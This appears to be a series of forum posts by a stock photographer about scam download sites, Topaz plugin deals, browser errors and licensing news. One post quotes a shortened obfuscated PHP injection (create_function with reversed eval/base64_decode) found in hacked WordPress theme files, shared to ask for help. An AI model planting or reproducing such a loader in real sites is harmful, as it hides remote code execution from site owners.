I don't do much with my legacy symbiostock site these days, but just got a message from my host company that I had too many files in my /symbiostock_xml_cache
I guess these files are never cleared automatically. Cleared it all manually now. You might want to look also at your /symbiostock_xml_cache directory and delete all or at least the oldest files.

I found one of my photo books (Georgian Bay Panoramas) advertised as a free PDF download on download-genius.com (and unfortunately also on other sites).
Sent them a DMCA Take Down letter, and then I searched for some more links to this site and found out that they take detailed info and some money from prospective downloaders, but never deliver anything. I don't know if they have indeed scanned the entire book (only 64 pages) and have it on their server. If yes, then I have a problem. If not, then they inflict more damage to the gullible would-be downloaders than to the image or book creators. Two other sites offering the same free download (there could be more): zhitongbooks.com facaibooks.top
Found through google: .Top is currently ranked #9 domain type in terms of registrations, surely helped by a 99 cent price tag at some registrars. The company behind it, Jiangsu Bangning Science & Technology Co., Ltd., is also raising awareness by sending spam to people who own other domain names.

I haven't checked nor updated my Symbio site for a while, and when I finally did, I found a "viagra" link displayed between the stock site name and image title. Linked to the following URL: www.xxxpowersconstruction.net/viagra-prices-cvs (inserted xxx into the name, not to reward this scumbag) After running Wordfence analysis, that utility reported a number of malicious php files in the wp-content directory. Critical Problems: * File appears to be malicious: wp-content/themes/advantica/functions.php * File appears to be malicious: wp-content/themes/clean-theme-2-0-1-old/functions.php * File appears to be malicious: wp-content/themes/clean-theme-2-0-1-old2/functions.php * File appears to be malicious: wp-content/themes/smallbiz/functions.php * File appears to be malicious: wp-content/themes/symbiostock/functions.php * File appears to be malicious: wp-content/themes/symbiostock-dragonfly/functions.php * File appears to be malicious: wp-content/themes/symbiostock-old/functions.php * File appears to be malicious: wp-content/themes/symbiostock-old2/functions.php * File appears to be malicious: wp-content/themes/twentyeleven/functions.php and a few other themes This is the data found in the php files (I shortened the code disguised as some gibberish shown in bold from about 80 lines to 1 line only - to eliminate any possibility of spreading this virus further): <?php $wp_user_functions_init = create_function('$a',strrev(';)a$(lave')); $wp_user_functions_init(strrev(' )"= oQD9pQD7kiIwhGcf52bpR3YuVnZft2YhJGbsF2YigCdyFGdz9lYvlgCNsXKpcCdyFGdz9lYvdCKzR3cphZoYWa"(edoced_46esab(lave')); ?> Not knowing much about php code, I deleted ALL the lines in the php files, and that got rid of the offending link, but I wonder if I should have some information in those php files. If symbiostock/functions.php should contain some essential information, please, let me know what it should be. I also wonder how my site got hacked. If my php files got infected through some plugin/theme, by direct attack to my Symbiosite or laterally on my host site.

Photographed paintings (watercolor, oil, acrylic) are accepted by some agencies. What are the agency rules for acceptance of "digital paintings"? IMHO, many "paintings" by simple oil and watercolor filters/plugins look atrocious, and most of them have pretty much the same generic look, but recently Topaz Labs released a new painting program called IMPRESSION which is much more advanced, and it looks very capable and extremely versatile. On their website (see link below) they show some impressive looking painterly transformations. Topaz ImpressionSimilar to many HDR pictures that are overdone, one could create over-the-top impressionistic or other painterly renditions, but when used judiciously, it seems that it is possible to produce also quite subtle and quite pleasing pictures that could almost pass as real paintings.

Topaz Remask 4 Topaz Labs just released a new version of their masking plugin - Remask 4. If you need to make some isolations, you might want to look at this nifty program. The new version is more streamlined and more precise in creation of complex masks than the previous Remask versions. Compared to the Photoshop CS5 which I'm using, the new Remask program is easier to use and it handles even tricky isolations very well. I don't know how it would compare to the latest Photoshop CC 2014. If you are already using presently Remask 3, you can upgrade it for free to Remask 4. I just posted a short description of this program with a couple of examples on my blogsite: http://advantica.wordpress.com/2014/07/22/topaz-remask/Remask 4 is offered until July 31, 2014 at a 50% discount, at $34.99 instead of regular $69.99. At that price, even if you produce just a handful of isolated objects from some of your existing shots, the program should quickly pay for itself. To try it out on some of your images, you can download a 30-days trial version for free. Here is the Topaz Remask 4 link: Topaz Remaskto purchase it at the reduced price, enter "julyremask" as the discount code at checkout.

Is there a limit on number of images in a set when viewed through the Show Stats in Actions Menu? The stats work great in smaller sets (i.e 20-200 images), but I get no results for larger sets (i.e. 600+)

Topaz Labs runs this month a promotion for Topaz Clean that can be used to smooth and clean portraits/faces, but you could use it also to control surface texture in other type of images. The current promotion ($14.99 instead of regular $29.99) will run until May 31, 2014. For more information or to purchase it at the reduced rate, use the link below: Topaz Cleanand enter "mayclean" as the discount code at the checkout to get 50% discount I have to admit that I haven't used this program very much before. I tried it again recently, this time on an image of a large airplane and the program did a really good job of getting rid of the noise in the shadow areas and all kinds of scuff marks on the fuselage. You can see the Before and After examples on the Topaz Clean review on my blogsite: http://advantica.wordpress.com/2014/05/10/topaz-clean-review/ Another user reported that she uses it with a great effect on cleaning up fractal images. Not something I would think of, but apparently the program smoothes it nicely without loosing the fine details. At this price, it's a simple and cheaper alternative to Topaz Simplify or Denoise plugins for cleaning up some images that could be otherwise rejected by the stock agency inspectors. As another possibility, if used with the Flat Style preset, the program creates a highly simplified version that could be used to generate a different variation of the original image - similar to some modes in their Simplify plugin.

For several months now, occasionally, when I force Screen Refresh or navigate to another screen within Shutterstock, I get a router error, ( http://dlinkrouter/error-404.htm) and then I'm redirected to my Router (using Dlink) login screen and I'm prompted to enter router password and go through the router login. Going backwards in the browser takes me back to the last SS screen and when I press F5 or try to navigate to another SS function, I get again the router error. At that point, if I type in the browser top field another URL, it opens without any problems. Also, if I close that tab and type SS URL in a new tab, usually it opens also correctly (not always). Typically, I have a number of other browser tabs open, and they all work fine. Even more interestingly, some of the other tabs may be multiple instances of SS sessions, and they work also fine. I'm using Win 8.1 and IE 11. I don't remember seeing this problem on my previous computer with Win 7. I suspect that it is some timing problem between SS, browser and router. Has anybody else experienced such problem and what could be causing it?

Well, the art image licensing beast has been released, it will definitely change the stock landscape, only the time will show how much, and how the buyers will react to the new offering. The whole concept of FAA art licensing as it was originally announced a few weeks ago, has been reworked and refined, and I think for better. The website name has been slightly modified from the original plan (technicaly, a subdomain of pixels.com), but the main change is that it's been made separate from the main FAA / pixels.com collection. Which is a good thing. FAA's markup remains at 30% of artist specified price, as announced previously. In other words, the artist keeps 77% of the licensing fee charged to the end user. Here is the announcement: http://fineartamerica.com/controlpanel/imagelicensingprogram.htmland more detailed information: http://fineartamerica.com/imagelicensing.html\/ Ron, thanks for pointing out that this has been already discussed in the thread shown below, I wasn't aware of it. I guess, this thread can be deleted or closed now.

Another month, another Topaz promotion! This month, Topaz Labs runs a 50% off promotion for their Topaz Detail sharpening plugin. This program allows you to specify sharpening on multiple levels with the addition of local contrast. I find it especially useful for the creative sharpening phase in landscape or macro images. The special price is only $19.99 instead of regular $39.99 which is a great deal for this plugin. Main features and benefits: * Better control over image detail. Detail uses size-based processing that lets you independently adjust small, medium, and large details. * More natural images. The technology in Detail substantially reduces the halos and artifacts you get from over-sharpening. * More volume and three-dimensionality. Detail can enhance larger image features to increase the perceived "depth" of your photo. I posted a short review of the Topaz Detail plugin with some examples on my blogsite. http://advantica.wordpress.com/2014/04/08/topaz-detail-3/The current promotion will run from Apr 10 to Apr 30, 2014. To see more information and before/after samples, or to buy it at the reduced rate, use the link below: Topaz Detailand enter "aprdetail" as the 50% discount code Using this link, you should get also a 15% discount on any of their other products EDIT: Added the link to the review on my blogsite.
